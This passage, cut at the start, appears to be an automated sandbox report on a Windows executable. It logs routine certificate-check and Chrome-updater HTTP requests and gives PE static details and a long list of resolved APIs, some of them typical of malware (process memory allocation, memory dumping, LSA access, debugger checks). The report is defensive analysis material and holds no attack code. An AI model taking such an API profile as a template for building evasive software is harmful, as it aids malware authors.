807. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D HTTP/1.1\r\nCache-Control: max-age = 386377\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 21 Mar 2019 05:58:32 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: th.symcd.com\r\n\r\n",
808. "port": 80
809. },
810. {
811. "count": 1,
812. "body": "",
813. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
814. "user-agent": "Microsoft-CryptoAPI/6.1",
815. "method": "GET",
816. "host": "ocsp.digicert.com",
817. "version": "1.1",
818. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
819. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D HTTP/1.1\r\nCache-Control: max-age = 142986\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 07:40:28 GMT\r\nIf-None-Match: \"5cece5ec-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
820. "port": 80
821. },
822. {
823. "count": 1,
824. "body": "",
825. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
826. "user-agent": "Microsoft-CryptoAPI/6.1",
827. "method": "GET",
828. "host": "ocsp.digicert.com",
829. "version": "1.1",
830. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
831. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D HTTP/1.1\r\nCache-Control: max-age = 161796\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 13:00:33 GMT\r\nIf-None-Match: \"5ced30f1-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
832. "port": 80
833. },
834. {
835. "count": 1,
836. "body": "",
837. "uri": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
838. "user-agent": "Microsoft-CryptoAPI/6.1",
839. "method": "GET",
840. "host": "ocsp.pki.goog",
841. "version": "1.1",
842. "path": "/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
843. "data": "GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
844. "port": 80
845. },
846. {
847. "count": 1,
848. "body": "",
849. "uri": "http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl",
850. "user-agent": "Microsoft-CryptoAPI/6.1",
851. "method": "GET",
852. "host": "crl.microsoft.com",
853. "version": "1.1",
854. "path": "/pki/crl/products/microsoftrootcert.crl",
855. "data": "GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 07 Mar 2019 06:00:16 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
856. "port": 80
857. },
858. {
859. "count": 1,
860. "body": "",
861. "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
862. "user-agent": "Microsoft BITS/7.5",
863. "method": "HEAD",
864. "host": "redirector.gvt1.com",
865. "version": "1.1",
866. "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
867. "data": "HEAD /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
868. "port": 80
869. }
870. ]
871.  
872. [*] Network Communication - SMTP: []
873.  
874. [*] Network Communication - Hosts: []
875.  
876. [*] Network Communication - IRC: []
877.  
878. [*] Static Analysis: {
879. "pe": {
880. "peid_signatures": null,
881. "imports": [
882. {
883. "imports": [
884. {
885. "name": "GetCurrentThread",
886. "address": "0x40a014"
887. },
888. {
889. "name": "GetOEMCP",
890. "address": "0x40a018"
891. },
892. {
893. "name": "GetTickCount",
894. "address": "0x40a01c"
895. },
896. {
897. "name": "GetProcAddress",
898. "address": "0x40a020"
899. },
900. {
901. "name": "LoadLibraryA",
902. "address": "0x40a024"
903. },
904. {
905. "name": "GetLastError",
906. "address": "0x40a028"
907. },
908. {
909. "name": "GetCommandLineW",
910. "address": "0x40a02c"
911. },
912. {
913. "name": "GetProcessHeap",
914. "address": "0x40a030"
915. },
916. {
917. "name": "InterlockedIncrement",
918. "address": "0x40a034"
919. },
920. {
921. "name": "lstrlenA",
922. "address": "0x40a038"
923. },
924. {
925. "name": "GetVersionExA",
926. "address": "0x40a03c"
927. },
928. {
929. "name": "GetVersionExW",
930. "address": "0x40a040"
931. },
932. {
933. "name": "InterlockedDecrement",
934. "address": "0x40a044"
935. },
936. {
937. "name": "GetCommandLineA",
938. "address": "0x40a048"
939. },
940. {
941. "name": "VirtualAllocEx",
942. "address": "0x40a04c"
943. },
944. {
945. "name": "GetCurrentProcess",
946. "address": "0x40a050"
947. },
948. {
949. "name": "GetModuleHandleA",
950. "address": "0x40a054"
951. },
952. {
953. "name": "GetStartupInfoW",
954. "address": "0x40a058"
955. }
956. ],
957. "dll": "KERNEL32.dll"
958. },
959. {
960. "imports": [
961. {
962. "name": "DefWindowProcW",
963. "address": "0x40a068"
964. },
965. {
966. "name": "LoadStringW",
967. "address": "0x40a06c"
968. },
969. {
970. "name": "SetActiveWindow",
971. "address": "0x40a070"
972. },
973. {
974. "name": "ReleaseCapture",
975. "address": "0x40a074"
976. },
977. {
978. "name": "CreateWindowExA",
979. "address": "0x40a078"
980. },
981. {
982. "name": "GetMenuStringW",
983. "address": "0x40a07c"
984. },
985. {
986. "name": "UnregisterClassA",
987. "address": "0x40a080"
988. },
989. {
990. "name": "DestroyWindow",
991. "address": "0x40a084"
992. },
993. {
994. "name": "RegisterClassW",
995. "address": "0x40a088"
996. },
997. {
998. "name": "SendMessageW",
999. "address": "0x40a08c"
1000. },
1001. {
1002. "name": "CreateWindowExW",
1003. "address": "0x40a090"
1004. },
1005. {
1006. "name": "SetWindowLongW",
1007. "address": "0x40a094"
1008. },
1009. {
1010. "name": "LoadIconA",
1011. "address": "0x40a098"
1012. }
1013. ],
1014. "dll": "USER32.dll"
1015. },
1016. {
1017. "imports": [
1018. {
1019. "name": "RegOpenKeyExW",
1020. "address": "0x40a000"
1021. },
1022. {
1023. "name": "RegOpenKeyExA",
1024. "address": "0x40a004"
1025. }
1026. ],
1027. "dll": "ADVAPI32.dll"
1028. },
1029. {
1030. "imports": [
1031. {
1032. "name": "ImageList_Add",
1033. "address": "0x40a00c"
1034. }
1035. ],
1036. "dll": "COMCTL32.dll"
1037. },
1038. {
1039. "imports": [
1040. {
1041. "name": "SetupDecompressOrCopyFileA",
1042. "address": "0x40a060"
1043. }
1044. ],
1045. "dll": "SETUPAPI.dll"
1046. },
1047. {
1048. "imports": [
1049. {
1050. "name": "_exit",
1051. "address": "0x40a0a0"
1052. },
1053. {
1054. "name": "_c_exit",
1055. "address": "0x40a0a4"
1056. },
1057. {
1058. "name": "_cexit",
1059. "address": "0x40a0a8"
1060. },
1061. {
1062. "name": "exit",
1063. "address": "0x40a0ac"
1064. },
1065. {
1066. "name": "_wcmdln",
1067. "address": "0x40a0b0"
1068. },
1069. {
1070. "name": "__wgetmainargs",
1071. "address": "0x40a0b4"
1072. },
1073. {
1074. "name": "_initterm",
1075. "address": "0x40a0b8"
1076. },
1077. {
1078. "name": "__setusermatherr",
1079. "address": "0x40a0bc"
1080. },
1081. {
1082. "name": "_adjust_fdiv",
1083. "address": "0x40a0c0"
1084. },
1085. {
1086. "name": "__p__commode",
1087. "address": "0x40a0c4"
1088. },
1089. {
1090. "name": "__p__fmode",
1091. "address": "0x40a0c8"
1092. },
1093. {
1094. "name": "__set_app_type",
1095. "address": "0x40a0cc"
1096. },
1097. {
1098. "name": "_controlfp",
1099. "address": "0x40a0d0"
1100. },
1101. {
1102. "name": "__dllonexit",
1103. "address": "0x40a0d4"
1104. },
1105. {
1106. "name": "_onexit",
1107. "address": "0x40a0d8"
1108. },
1109. {
1110. "name": "_except_handler3",
1111. "address": "0x40a0dc"
1112. },
1113. {
1114. "name": "_XcptFilter",
1115. "address": "0x40a0e0"
1116. }
1117. ],
1118. "dll": "msvcrt.dll"
1119. }
1120. ],
1121. "digital_signers": null,
1122. "exported_dll_name": null,
1123. "actual_checksum": "0x0002d30a",
1124. "overlay": {
1125. "size": "0x00001f00",
1126. "offset": "0x00025000"
1127. },
1128. "imagebase": "0x00400000",
1129. "reported_checksum": "0x0002d30a",
1130. "icon_hash": null,
1131. "entrypoint": "0x004083d6",
1132. "timestamp": "2019-06-12 20:02:55",
1133. "osversion": "4.0",
1134. "sections": [
1135. {
1136. "name": ".text",
1137. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1138. "virtual_address": "0x00001000",
1139. "size_of_data": "0x00008000",
1140. "entropy": "5.82",
1141. "raw_address": "0x00001000",
1142. "virtual_size": "0x000076b6",
1143. "characteristics_raw": "0xf0000020"
1144. },
1145. {
1146. "name": ".bss",
1147. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1148. "virtual_address": "0x00009000",
1149. "size_of_data": "0x00000000",
1150. "entropy": "0.00",
1151. "raw_address": "0x00000000",
1152. "virtual_size": "0x00000030",
1153. "characteristics_raw": "0xc0000080"
1154. },
1155. {
1156. "name": ".rdata",
1157. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
1158. "virtual_address": "0x0000a000",
1159. "size_of_data": "0x00001000",
1160. "entropy": "2.39",
1161. "raw_address": "0x00009000",
1162. "virtual_size": "0x0000061c",
1163. "characteristics_raw": "0x40000040"
1164. },
1165. {
1166. "name": ".data",
1167. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1168. "virtual_address": "0x0000b000",
1169. "size_of_data": "0x0001a000",
1170. "entropy": "6.12",
1171. "raw_address": "0x0000a000",
1172. "virtual_size": "0x00019d54",
1173. "characteristics_raw": "0xd0000040"
1174. },
1175. {
1176. "name": ".reloc",
1177. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
1178. "virtual_address": "0x00025000",
1179. "size_of_data": "0x00001000",
1180. "entropy": "0.68",
1181. "raw_address": "0x00024000",
1182. "virtual_size": "0x0000025c",
1183. "characteristics_raw": "0x42000040"
1184. }
1185. ],
1186. "resources": [],
1187. "dirents": [
1188. {
1189. "virtual_address": "0x00000000",
1190. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
1191. "size": "0x00000000"
1192. },
1193. {
1194. "virtual_address": "0x0000a104",
1195. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
1196. "size": "0x0000008c"
1197. },
1198. {
1199. "virtual_address": "0x00000000",
1200. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
1201. "size": "0x00000000"
1202. },
1203. {
1204. "virtual_address": "0x00000000",
1205. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
1206. "size": "0x00000000"
1207. },
1208. {
1209. "virtual_address": "0x00025000",
1210. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
1211. "size": "0x00001f00"
1212. },
1213. {
1214. "virtual_address": "0x00025000",
1215. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
1216. "size": "0x00000118"
1217. },
1218. {
1219. "virtual_address": "0x00000000",
1220. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
1221. "size": "0x00000000"
1222. },
1223. {
1224. "virtual_address": "0x00000000",
1225. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
1226. "size": "0x00000000"
1227. },
1228. {
1229. "virtual_address": "0x00000000",
1230. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
1231. "size": "0x00000000"
1232. },
1233. {
1234. "virtual_address": "0x00000000",
1235. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
1236. "size": "0x00000000"
1237. },
1238. {
1239. "virtual_address": "0x00000000",
1240. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
1241. "size": "0x00000000"
1242. },
1243. {
1244. "virtual_address": "0x00000000",
1245. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
1246. "size": "0x00000000"
1247. },
1248. {
1249. "virtual_address": "0x0000a000",
1250. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
1251. "size": "0x000000e8"
1252. },
1253. {
1254. "virtual_address": "0x00000000",
1255. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
1256. "size": "0x00000000"
1257. },
1258. {
1259. "virtual_address": "0x00000000",
1260. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
1261. "size": "0x00000000"
1262. },
1263. {
1264. "virtual_address": "0x00000000",
1265. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
1266. "size": "0x00000000"
1267. }
1268. ],
1269. "exports": [],
1270. "guest_signers": {},
1271. "imphash": "7e4334085562a74ad98ab8806ba673ef",
1272. "icon_fuzzy": null,
1273. "icon": null,
1274. "pdbpath": null,
1275. "imported_dll_count": 6,
1276. "versioninfo": []
1277. }
1278. }
1279.  
1280. [*] Resolved APIs: [
1281. "user32.dll.GetWindowContextHelpId",
1282. "kernel32.dll.VirtualAlloc",
1283. "kernel32.dll.VirtualProtect",
1284. "kernel32.dll.LoadLibraryA",
1285. "kernel32.dll.VirtualFree",
1286. "kernel32.dll.VirtualQuery",
1287. "kernel32.dll.GetConsoleCP",
1288. "kernel32.dll.CreatePipe",
1289. "kernel32.dll.ExpandEnvironmentStringsA",
1290. "kernel32.dll.SetErrorMode",
1291. "kernel32.dll.SetFilePointer",
1292. "kernel32.dll.SetEndOfFile",
1293. "kernel32.dll.lstrlenA",
1294. "kernel32.dll.GetEnvironmentVariableA",
1295. "kernel32.dll.WaitForSingleObject",
1296. "kernel32.dll.GetCurrentThreadId",
1297. "kernel32.dll.lstrcmpA",
1298. "kernel32.dll.GetVersionExW",
1299. "kernel32.dll.ReleaseMutex",
1300. "kernel32.dll.DuplicateHandle",
1301. "kernel32.dll.lstrcatA",
1302. "kernel32.dll.ExitThread",
1303. "kernel32.dll.GetModuleHandleA",
1304. "kernel32.dll.GetACP",
1305. "kernel32.dll.OpenProcess",
1306. "kernel32.dll.Sleep",
1307. "kernel32.dll.GetFileInformationByHandle",
1308. "kernel32.dll.GetLastError",
1309. "kernel32.dll.OutputDebugStringW",
1310. "kernel32.dll.CreateFileA",
1311. "kernel32.dll.GetCurrentThread",
1312. "kernel32.dll.DeleteFileA",
1313. "kernel32.dll.GlobalAlloc",
1314. "kernel32.dll.lstrcpyA",
1315. "kernel32.dll.CloseHandle",
1316. "kernel32.dll.ResetEvent",
1317. "kernel32.dll.GetLocalTime",
1318. "kernel32.dll.GetProcAddress",
1319. "kernel32.dll.CreateFileMappingA",
1320. "kernel32.dll.GetFileSize",
1321. "kernel32.dll.DeleteCriticalSection",
1322. "kernel32.dll.ExitProcess",
1323. "kernel32.dll.LCMapStringW",
1324. "kernel32.dll.lstrcpynA",
1325. "kernel32.dll.InterlockedDecrement",
1326. "kernel32.dll.AddConsoleAliasW",
1327. "kernel32.dll.SystemTimeToFileTime",
1328. "kernel32.dll.GetModuleHandleW",
1329. "kernel32.dll.CreateProcessA",
1330. "kernel32.dll.AddAtomW",
1331. "kernel32.dll.CreateDirectoryA",
1332. "kernel32.dll.OpenMutexW",
1333. "kernel32.dll.LocalShrink",
1334. "kernel32.dll.IsDebuggerPresent",
1335. "kernel32.dll.FlushFileBuffers",
1336. "kernel32.dll.CreateFileW",
1337. "kernel32.dll.WriteConsoleW",
1338. "kernel32.dll.SetFilePointerEx",
1339. "kernel32.dll.HeapReAlloc",
1340. "kernel32.dll.HeapSize",
1341. "kernel32.dll.GetConsoleMode",
1342. "kernel32.dll.GetProcessHeap",
1343. "kernel32.dll.GetStringTypeW",
1344. "kernel32.dll.SetStdHandle",
1345. "kernel32.dll.FreeEnvironmentStringsW",
1346. "kernel32.dll.GetEnvironmentStringsW",
1347. "kernel32.dll.GetCommandLineA",
1348. "kernel32.dll.GetCPInfo",
1349. "kernel32.dll.GetOEMCP",
1350. "kernel32.dll.IsValidCodePage",
1351. "kernel32.dll.FindNextFileA",
1352. "kernel32.dll.FindFirstFileExA",
1353. "kernel32.dll.FindClose",
1354. "kernel32.dll.DeviceIoControl",
1355. "kernel32.dll.OutputDebugStringA",
1356. "kernel32.dll.WriteConsoleA",
1357. "kernel32.dll.GetShortPathNameA",
1358. "kernel32.dll.GetStdHandle",
1359. "kernel32.dll.GetCurrentProcess",
1360. "kernel32.dll.GetCommandLineW",
1361. "kernel32.dll.SetLastError",
1362. "kernel32.dll.EraseTape",
1363. "kernel32.dll.GetFileType",
1364. "kernel32.dll.HeapCreate",
1365. "kernel32.dll.GetFileSizeEx",
1366. "kernel32.dll.GlobalGetAtomNameA",
1367. "kernel32.dll.GetModuleFileNameA",
1368. "kernel32.dll.ReadFile",
1369. "kernel32.dll.HeapAlloc",
1370. "kernel32.dll.HeapFree",
1371. "kernel32.dll.GetModuleHandleExW",
1372. "kernel32.dll.WideCharToMultiByte",
1373. "kernel32.dll.MultiByteToWideChar",
1374. "kernel32.dll.WriteFile",
1375. "kernel32.dll.LoadLibraryExW",
1376. "kernel32.dll.FreeLibrary",
1377. "kernel32.dll.TlsFree",
1378. "kernel32.dll.LocalFree",
1379. "kernel32.dll.QueryPerformanceCounter",
1380. "kernel32.dll.GetCurrentProcessId",
1381. "kernel32.dll.GetSystemTimeAsFileTime",
1382. "kernel32.dll.InitializeSListHead",
1383. "kernel32.dll.UnhandledExceptionFilter",
1384. "kernel32.dll.SetUnhandledExceptionFilter",
1385. "kernel32.dll.GetStartupInfoW",
1386. "kernel32.dll.IsProcessorFeaturePresent",
1387. "kernel32.dll.TerminateProcess",
1388. "kernel32.dll.RaiseException",
1389. "kernel32.dll.RtlUnwind",
1390. "kernel32.dll.EnterCriticalSection",
1391. "kernel32.dll.LeaveCriticalSection",
1392. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
1393. "kernel32.dll.TlsAlloc",
1394. "kernel32.dll.TlsGetValue",
1395. "kernel32.dll.TlsSetValue",
1396. "user32.dll.TranslateMessage",
1397. "user32.dll.BeginPaint",
1398. "user32.dll.ChildWindowFromPoint",
1399. "user32.dll.LoadImageW",
1400. "user32.dll.UnhookWinEvent",
1401. "user32.dll.GetMenu",
1402. "user32.dll.GetFocus",
1403. "user32.dll.GetMenuItemCount",
1404. "user32.dll.DrawIcon",
1405. "user32.dll.RegisterClassExA",
1406. "user32.dll.TrackPopupMenu",
1407. "user32.dll.wsprintfA",
1408. "user32.dll.DialogBoxIndirectParamA",
1409. "user32.dll.IsChild",
1410. "user32.dll.LoadAcceleratorsA",
1411. "user32.dll.CharNextW",
1412. "user32.dll.LoadAcceleratorsW",
1413. "user32.dll.GetClipboardData",
1414. "user32.dll.OemToCharA",
1415. "user32.dll.LoadCursorW",
1416. "user32.dll.SetDlgItemTextA",
1417. "user32.dll.wsprintfW",
1418. "user32.dll.CheckDlgButton",
1419. "user32.dll.GetDesktopWindow",
1420. "gdi32.dll.CreateFontA",
1421. "gdi32.dll.StartDocA",
1422. "gdi32.dll.CreateDCW",
1423. "gdi32.dll.SetWindowExtEx",
1424. "gdi32.dll.SetViewportExtEx",
1425. "gdi32.dll.CreateMetaFileA",
1426. "gdi32.dll.TextOutA",
1427. "gdi32.dll.SetMapMode",
1428. "gdi32.dll.SetTextColor",
1429. "winspool.drv.GetPrinterA",
1430. "advapi32.dll.RegCloseKey",
1431. "advapi32.dll.RegFlushKey",
1432. "advapi32.dll.RegSetValueExW",
1433. "advapi32.dll.GetUserNameW",
1434. "advapi32.dll.RegOpenKeyW",
1435. "shell32.dll.ShellExecuteA",
1436. "shell32.dll.SHGetSpecialFolderPathA",
1437. "ole32.dll.CoCreateInstance",
1438. "ole32.dll.CoUninitialize",
1439. "ole32.dll.CoCreateGuid",
1440. "ole32.dll.CoInitializeSecurity",
1441. "ole32.dll.CoInitializeEx",
1442. "ole32.dll.CoInitialize",
1443. "oleaut32.dll.#8",
1444. "oleaut32.dll.#6",
1445. "oleaut32.dll.#2",
1446. "oleaut32.dll.#9",
1447. "shlwapi.dll.StrStrA",
1448. "kernel32.dll.InitializeCriticalSectionEx",
1449. "kernel32.dll.FlsAlloc",
1450. "kernel32.dll.FlsSetValue",
1451. "kernel32.dll.FlsGetValue",
1452. "kernel32.dll.LCMapStringEx",
1453. "kernel32.dll.SortGetHandle",
1454. "kernel32.dll.SortCloseHandle",
1455. "ole32.dll.OleInitialize",
1456. "cryptbase.dll.SystemFunction036",
1457. "uxtheme.dll.ThemeInitApiHook",
1458. "user32.dll.IsProcessDPIAware",
1459. "ole32.dll.CreateBindCtx",
1460. "ole32.dll.CoTaskMemAlloc",
1461. "propsys.dll.PSCreateMemoryPropertyStore",
1462. "propsys.dll.PSPropertyBag_WriteDWORD",
1463. "ole32.dll.CoGetApartmentType",
1464. "ole32.dll.CoRegisterInitializeSpy",
1465. "ole32.dll.CoTaskMemFree",
1466. "comctl32.dll.#236",
1467. "ole32.dll.CoGetMalloc",
1468. "propsys.dll.PSPropertyBag_ReadDWORD",
1469. "propsys.dll.PSPropertyBag_ReadGUID",
1470. "comctl32.dll.#320",
1471. "comctl32.dll.#324",
1472. "comctl32.dll.#323",
1473. "advapi32.dll.RegEnumKeyW",
1474. "advapi32.dll.OpenThreadToken",
1475. "apphelp.dll.ApphelpCheckShellObject",
1476. "urlmon.dll.CreateUri",
1477. "kernel32.dll.InitializeSRWLock",
1478. "kernel32.dll.AcquireSRWLockExclusive",
1479. "kernel32.dll.AcquireSRWLockShared",
1480. "kernel32.dll.ReleaseSRWLockExclusive",
1481. "kernel32.dll.ReleaseSRWLockShared",
1482. "comctl32.dll.#328",
1483. "comctl32.dll.#334",
1484. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
1485. "shell32.dll.#102",
1486. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
1487. "propsys.dll.PSPropertyBag_ReadStrAlloc",
1488. "comctl32.dll.#332",
1489. "advapi32.dll.InitializeSecurityDescriptor",
1490. "advapi32.dll.SetEntriesInAclW",
1491. "ntmarta.dll.GetMartaExtensionInterface",
1492. "advapi32.dll.SetSecurityDescriptorDacl",
1493. "comctl32.dll.#386",
1494. "advapi32.dll.IsTextUnicode",
1495. "comctl32.dll.#338",
1496. "sechost.dll.ConvertSidToStringSidW",
1497. "propsys.dll.#430",
1498. "advapi32.dll.RegOpenKeyExW",
1499. "advapi32.dll.RegGetValueW",
1500. "ole32.dll.CoTaskMemRealloc",
1501. "propsys.dll.InitPropVariantFromStringAsVector",
1502. "propsys.dll.PSCoerceToCanonicalValue",
1503. "propsys.dll.PropVariantToStringAlloc",
1504. "ole32.dll.PropVariantClear",
1505. "ole32.dll.CoAllowSetForegroundWindow",
1506. "shell32.dll.SHGetFolderPathW",
1507. "advapi32.dll.SaferGetPolicyInformation",
1508. "ntdll.dll.RtlDllShutdownInProgress",
1509. "comctl32.dll.#329",
1510. "ole32.dll.OleUninitialize",
1511. "ole32.dll.CoRevokeInitializeSpy",
1512. "comctl32.dll.#388",
1513. "oleaut32.dll.#500",
1514. "wininet.dll.InternetReadFile",
1515. "rasapi32.dll.RasConnectionNotificationW",
1516. "sechost.dll.NotifyServiceStatusChangeA",
1517. "rpcrt4.dll.RpcBindingFree",
1518. "advapi32.dll.UnregisterTraceGuids",
1519. "comctl32.dll.#321",
1520. "cscapi.dll.CscNetApiGetInterface",
1521. "advapi32.dll.LsaOpenPolicy",
1522. "advapi32.dll.LsaQueryInformationPolicy",
1523. "netutils.dll.NetApiBufferAllocate",
1524. "advapi32.dll.LsaFreeMemory",
1525. "advapi32.dll.LsaClose",
1526. "netutils.dll.NetApiBufferFree",
1527. "kernel32.dll.SetThreadUILanguage",
1528. "kernel32.dll.CopyFileExW",
1529. "kernel32.dll.SetConsoleInputExeNameW",
1530. "rpcrt4.dll.I_RpcSNCHOption",
1531. "sechost.dll.OpenSCManagerW",
1532. "sechost.dll.OpenServiceW",
1533. "sechost.dll.CloseServiceHandle",
1534. "sechost.dll.ControlService",
1535. "sechost.dll.QueryServiceStatus",
1536. "sechost.dll.StartServiceW",
1537. "secur32.dll.GetUserNameExW",
1538. "secur32.dll.InitializeSecurityContextW",
1539. "secur32.dll.FreeCredentialsHandle",
1540. "secur32.dll.AcquireCredentialsHandleW",
1541. "secur32.dll.QuerySecurityPackageInfoW",
1542. "secur32.dll.CompleteAuthToken",
1543. "secur32.dll.FreeContextBuffer",
1544. "secur32.dll.GetUserNameExA",
1545. "winscard.dll.SCardEstablishContext",
1546. "winscard.dll.SCardReleaseContext",
1547. "winscard.dll.SCardGetStatusChangeW",
1548. "winscard.dll.SCardListReadersW",
1549. "ws2_32.dll.#151",
1550. "ws2_32.dll.freeaddrinfo",
1551. "ws2_32.dll.#21",
1552. "ws2_32.dll.#19",
1553. "ws2_32.dll.#16",
1554. "ws2_32.dll.#10",
1555. "ws2_32.dll.#111",
1556. "ws2_32.dll.#116",
1557. "ws2_32.dll.#115",
1558. "ws2_32.dll.WSAIoctl",
1559. "ws2_32.dll.#4",
1560. "ws2_32.dll.#23",
1561. "ws2_32.dll.#11",
1562. "ws2_32.dll.#3",
1563. "ws2_32.dll.#18",
1564. "ws2_32.dll.getaddrinfo",
1565. "ws2_32.dll.#9",
1566. "userenv.dll.CreateEnvironmentBlock",
1567. "userenv.dll.DestroyEnvironmentBlock",
1568. "dbghelp.dll.MiniDumpWriteDump",
1569. "wtsapi32.dll.WTSEnumerateSessionsW",
1570. "ole32.dll.CoSetProxyBlanket",
1571. "kernel32.dll.InitializeCriticalSection",
1572. "kernel32.dll.TryEnterCriticalSection",
1573. "kernel32.dll.SizeofResource",
1574. "kernel32.dll.InitAtomTable",
1575. "kernel32.dll.SetHandleCount",
1576. "kernel32.dll.LoadModule",
1577. "kernel32.dll.ClearCommError",
1578. "kernel32.dll.GetCommConfig",
1579. "kernel32.dll.GetCommMask",
1580. "kernel32.dll.TransmitCommChar",
1581. "kernel32.dll.GetTapeParameters",
1582. "kernel32.dll.MulDiv",
1583. "kernel32.dll.GetSystemTime",
1584. "kernel32.dll.GetTimeZoneInformation",
1585. "kernel32.dll.FileTimeToSystemTime",
1586. "kernel32.dll.CompareFileTime",
1587. "kernel32.dll.DosDateTimeToFileTime",
1588. "kernel32.dll.GetTickCount",
1589. "kernel32.dll.GetNamedPipeInfo",
1590. "kernel32.dll.UnmapViewOfFile",
1591. "kernel32.dll.lstrcmpiA",
1592. "kernel32.dll.lstrcpyW",
1593. "kernel32.dll.lstrcatW",
1594. "kernel32.dll.lstrlenW",
1595. "kernel32.dll._lcreat",
1596. "kernel32.dll.CreateMutexA",
1597. "kernel32.dll.CreateMutexW",
